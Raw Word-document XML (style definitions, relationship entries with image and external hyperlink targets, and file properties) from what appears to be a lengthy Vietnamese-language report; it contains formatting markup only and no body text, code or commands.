    <w:name w:val="_Style 23"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style24">
    <w:name w:val="_Style 24"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style25">
    <w:name w:val="_Style 25"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style26">
    <w:name w:val="_Style 26"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style27">
    <w:name w:val="_Style 27"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style28">
    <w:name w:val="_Style 28"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style29">
    <w:name w:val="_Style 29"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style30">
    <w:name w:val="_Style 30"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style31">
    <w:name w:val="_Style 31"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style32">
    <w:name w:val="_Style 32"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style33">
    <w:name w:val="_Style 33"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style34">
    <w:name w:val="_Style 34"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style35">
    <w:name w:val="_Style 35"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style36">
    <w:name w:val="_Style 36"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style37">
    <w:name w:val="_Style 37"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style38">
    <w:name w:val="_Style 38"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style39">
    <w:name w:val="_Style 39"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style40">
    <w:name w:val="_Style 40"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style41">
    <w:name w:val="_Style 41"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style42">
    <w:name w:val="_Style 42"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style43">
    <w:name w:val="_Style 43"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style44">
    <w:name w:val="_Style 44"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style45">
    <w:name w:val="_Style 45"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style46">
    <w:name w:val="_Style 46"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style47">
    <w:name w:val="_Style 47"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style48">
    <w:name w:val="_Style 48"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style49">
    <w:name w:val="_Style 49"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style50">
    <w:name w:val="_Style 50"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style51">
    <w:name w:val="_Style 51"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style52">
    <w:name w:val="_Style 52"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style53">
    <w:name w:val="_Style 53"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style54">
    <w:name w:val="_Style 54"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style55">
    <w:name w:val="_Style 55"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style56">
    <w:name w:val="_Style 56"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style57">
    <w:name w:val="_Style 57"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style58">
    <w:name w:val="_Style 58"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style59">
    <w:name w:val="_Style 59"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style60">
    <w:name w:val="_Style 60"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style61">
    <w:name w:val="_Style 61"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style62">
    <w:name w:val="_Style 62"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style63">
    <w:name w:val="_Style 63"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style64">
    <w:name w:val="_Style 64"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style65">
    <w:name w:val="_Style 65"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style66">
    <w:name w:val="_Style 66"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style67">
    <w:name w:val="_Style 67"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style68">
    <w:name w:val="_Style 68"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style69">
    <w:name w:val="_Style 69"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style70">
    <w:name w:val="_Style 70"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style71">
    <w:name w:val="_Style 71"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style72">
    <w:name w:val="_Style 72"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style73">
    <w:name w:val="_Style 73"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style74">
    <w:name w:val="_Style 74"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style75">
    <w:name w:val="_Style 75"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style76">
    <w:name w:val="_Style 76"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style77">
    <w:name w:val="_Style 77"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style78">
    <w:name w:val="_Style 78"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style79">
    <w:name w:val="_Style 79"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style80">
    <w:name w:val="_Style 80"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style81">
    <w:name w:val="_Style 81"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style82">
    <w:name w:val="_Style 82"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style83">
    <w:name w:val="_Style 83"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style84">
    <w:name w:val="_Style 84"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style85">
    <w:name w:val="_Style 85"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style86">
    <w:name w:val="_Style 86"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style87">
    <w:name w:val="_Style 87"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style88">
    <w:name w:val="_Style 88"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style89">
    <w:name w:val="_Style 89"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style90">
    <w:name w:val="_Style 90"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style91">
    <w:name w:val="_Style 91"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style92">
    <w:name w:val="_Style 92"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style93">
    <w:name w:val="_Style 93"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style94">
    <w:name w:val="_Style 94"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style95">
    <w:name w:val="_Style 95"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style96">
    <w:name w:val="_Style 96"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style97">
    <w:name w:val="_Style 97"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style98">
    <w:name w:val="_Style 98"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style99">
    <w:name w:val="_Style 99"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style100">
    <w:name w:val="_Style 100"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style101">
    <w:name w:val="_Style 101"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style102">
    <w:name w:val="_Style 102"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style103">
    <w:name w:val="_Style 103"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style104">
    <w:name w:val="_Style 104"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style105">
    <w:name w:val="_Style 105"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style106">
    <w:name w:val="_Style 106"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="15" w:type="dxa"/>
        <w:left w:w="15" w:type="dxa"/>
        <w:bottom w:w="15" w:type="dxa"/>
        <w:right w:w="15" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style107">
    <w:name w:val="_Style 107"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style108">
    <w:name w:val="_Style 108"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style109">
    <w:name w:val="_Style 109"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style110">
    <w:name w:val="_Style 110"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style111">
    <w:name w:val="_Style 111"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style112">
    <w:name w:val="_Style 112"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style113">
    <w:name w:val="_Style 113"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style114">
    <w:name w:val="_Style 114"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style115">
    <w:name w:val="_Style 115"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style116">
    <w:name w:val="_Style 116"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style117">
    <w:name w:val="_Style 117"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style118">
    <w:name w:val="_Style 118"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style119">
    <w:name w:val="_Style 119"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style120">
    <w:name w:val="_Style 120"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style121">
    <w:name w:val="_Style 121"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style122">
    <w:name w:val="_Style 122"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-V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TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:after="100" w:line="269" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:line="269" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B0471D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001030E8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001030E8"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001030E8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001030E8"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AC2AC8"/>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C2AC8"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rockyou.txt.gz" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId33"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webSettings" Target="webSettings.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/th4nhh4i/ServerC-Hai" TargetMode="External"/><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 Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.174.162:8000" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kkrypt0nn/wordlists.g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GBLGr3mB5JklysqMfh+kjGvgOw==">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3BBCDE8-6E69-4A9D-929E-7B37605ED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1473</TotalTime>
  <Pages>104</Pages>
  <Words>9049</Words>
  <Characters>51583</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>429</Lines>
  <Paragraphs>121</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
